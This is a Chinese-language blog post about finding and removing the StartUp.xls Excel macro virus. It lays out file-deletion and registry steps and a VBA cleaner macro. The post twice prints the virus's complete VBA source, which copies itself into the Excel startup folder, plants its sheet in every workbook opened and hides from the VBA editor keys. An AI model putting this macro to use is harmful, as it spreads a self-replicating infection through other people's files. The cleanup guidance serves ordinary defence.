今天一个朋友让我帮忙看一个问题,说是Excel文件一打开再保存就提示“此文档中包含宏、ActiveX 控件、XML 扩展包信息或Web组件。他们中可能含个人作息,这些作息无法能过设置“工具”菜单下“选项”对话框“安全性”选项卡中的“保存时从文件属性中删除个人作息”来删除”。当时只是以为设置的问题,后来查了好几小时才发现原来是中了个宏病毒,名字是:StartUp.xls,中间定位病毒的过程也比较曲折(主要是自己学艺不精)。
病毒样本如下:
Sub auto_open()
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
Application.ScreenUpdating = False
ThisWorkbook.Sheets("StartUp").Copy
ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
n$ = ActiveWorkbook.Name
ActiveWindow.Visible = False
Workbooks("StartUp.xls").Save
Workbooks(n$).Close (False)
End If
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub
Sub cop()
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
Application.ScreenUpdating = False
n$ = ActiveSheet.Name
Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
Sheets(n$).Select
End If
End Sub
Sub back()
On Error Resume Next
Application.OnKey "%{F8}", "StartUp.xls!escape"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop"
Workbooks.Open Application.StartupPath & "\StartUp.xls"
End Sub
Sub escape()
On Error Resume Next
Application.OnSheetActivate = "StartUp.xls!back"
Application.OnKey "%{F11}"
Application.OnKey "%{F8}"
Application.SendKeys "%{F11}"
Application.SendKeys "%{F8}"
For Each book In Workbooks
Application.DisplayAlerts = False
If book "StartUp.xls" Then book.Sheets("StartUp").Delete
Next
For Each book In Workbooks
If book.Name = "StartUp.xls" Then
book.Close
End If
Next
End Sub
通过参考网上一些资料,采取以下的方法处理,可以清除病毒并使感染文件在修改保存后也清除病毒(网上有人说用360或卡巴直接杀会导致文件打不开,没有试验,不知是真是假):
一、删除
C:\Documents and Settings\Administrator\Application Data\Microsoft\Excel\Excel11.xls
,该文件删除后,Excel会自动重建的
二、删除
C:\Documents and Settings\Administrator\Application Data\Microsoft\Excel\XLSTART\StartUp.xls
三、新建一个空的StartUp.xls,然后录制宏(随便录,只是为了能打开VBA编辑器);
四、从“工具->宏->宏”里面,选择刚才录制的宏,选择“编辑”,把全部内容都选中,把用下列内容替换:
Sub auto_open()
On Error Resume Next
Application.ScreenUpdating = False
ActiveWindow.Visible = False
n$ = ActiveWorkbook.Name
Workbooks(n$).Close (False)
Application.OnSheetActivate = "StartUp.xls!cop"
End Sub
Sub cop()
On Error Resume Next
Dim VBC As Object
Dim Name As String
'Dim delComponent As VBComponent 网上有人贴的代码里有这句,经实测,这句会导致编译错误。VBA中没有VBComponent对象
Name = "StartUp"
For Each book In Workbooks
Set delComponent = book.VBAProject.VBComponents(Name)
book.VBAProject.VBComponents.Remove delComponent
Next
End Sub
五、保存,然后再打开染毒文档,修改保存一下就可以清除掉感染的病毒。
=================================================
另:
StartUp.xls宏病毒清除方法
第一步:清除C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART下的StartUp.xls;
第二步:清除C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\的Excel11.xls,Excel程序会自建该文件。
第三步:新建C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART\startup.xls文件,输入以下代码(代码下面红字)就行了,以后再打开带毒的excel文件就会自动清除excel文件自带的病毒宏代码了
(防止宏病毒代码,2010.11.18测试可用)
Sub auto_open()
On Error Resume Next
Application.ScreenUpdating = False
ActiveWindow.Visible = False
n$ = ActiveWorkbook.Name
Workbooks(n$).Close (False)
Application.OnSheetActivate = "StartUp.xls!cop"
End Sub
Sub cop()
On Error Resume Next
Dim VBC As Object
Dim Name As String
'Dim delComponent As VBComponent
Name = "StartUp"
For Each book In Workbooks
Set delComponent = book.VBAProject.VBComponents(Name)
book.VBAProject.VBComponents.Remove delComponent
Next
End Sub
(注意:以下是宏病毒的代码)(声明:以下代码来源于网络,纯属个人爱好收藏,不能作为非法用途!2010.11.18测试可用)
Sub auto_open()
On Error Resume Next
If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
Application.ScreenUpdating = False
ThisWorkbook.Sheets("StartUp").Copy
ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
n$ = ActiveWorkbook.Name
ActiveWindow.Visible = False
Workbooks("StartUp.xls").Save
Workbooks(n$).Close (False)
End If
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub
Sub cop()
On Error Resume Next
If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
Application.ScreenUpdating = False
n$ = ActiveSheet.Name
Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
Sheets(n$).Select
End If
End Sub
Sub back()
On Error Resume Next
Application.OnKey "%{F8}", "StartUp.xls!escape"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop"
Workbooks.Open Application.StartupPath & "\StartUp.xls"
End Sub
Sub escape()
On Error Resume Next
Application.OnSheetActivate = "StartUp.xls!back"
Application.OnKey "%{F11}"
Application.OnKey "%{F8}"
Application.SendKeys "%{F11}"
Application.SendKeys "%{F8}"
For Each book In Workbooks
Application.DisplayAlerts = False
If book "StartUp.xls" Then book.Sheets("StartUp").Delete
Next
For Each book In Workbooks
If book.Name = "StartUp.xls" Then
book.Close
End If
Next
End Sub
=================================================
清除方法:如果有好多xls文件被感染,建议先下病毒专杀(CleanMacro),把本机的xls宏命令全部删除。此软件支持DOS命令操作。如果窗口界面清除时报错,建议用CMD命令运行。
清理完本机自带的所以宏命令后,如果转载,请注明是转载的,尊重别人的劳动成功!
1.把C:\Documents and Settings\用户名\Application Data\Microsoft\Excel\xlstart和C:\Program Files\Microsoft Office\OFFICE11\XLSTART(此路径下如果没有文件请忽略) 下的rpt_pdm2cvs.xls文件删除,并建立空的为只读的rpt_pdm2cvs.xls文件。
2.把宏的安全性设置为高以防止重复感染(HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\11.0\Excel\Security右边窗口的Level改为3).
3.打开原染毒文件,按Alt+F11打开Visual Basic编辑器,清空原病毒文件里的病毒代码,移除模块下的copymod模块,保存文件后即恢复正常文件!
4.卸装office软件,建议用360等软件完美卸装和删除相关文件。手动删除注册表项(跟EXCEL相关项都要删除)和公用配置文件(common Flies\microsoft shared\office*)模板文件(C:\Documents and Settings\用户名\Application Data\Microsoft\Excel和C:\Documents and Settings\用户名\Application Data\Microsoft\office和C:\Program Files\Microsoft Office\OFFICE11),重新启动电脑后安装Office2003,此时还要检测注册表里的宏安全性设置是否为高,建议把刚才的第二步操作重复一次!
为懒人准备,安装以下专杀工具可以查杀,不会损坏宏病毒感染的原xls文件: